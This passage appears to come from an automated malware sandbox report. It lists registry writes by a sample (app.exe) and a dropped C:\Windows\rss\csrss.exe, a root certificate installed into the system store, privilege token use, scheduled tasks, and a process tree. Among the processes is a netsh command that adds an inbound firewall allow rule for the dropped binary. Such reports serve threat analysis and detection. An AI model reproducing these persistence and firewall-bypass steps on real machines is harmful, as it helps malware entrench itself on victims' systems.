| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\rss\csrss.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 924
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 1404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 1424
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 1380
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 736
C:\Windows\SysWOW64\WerFault.exe
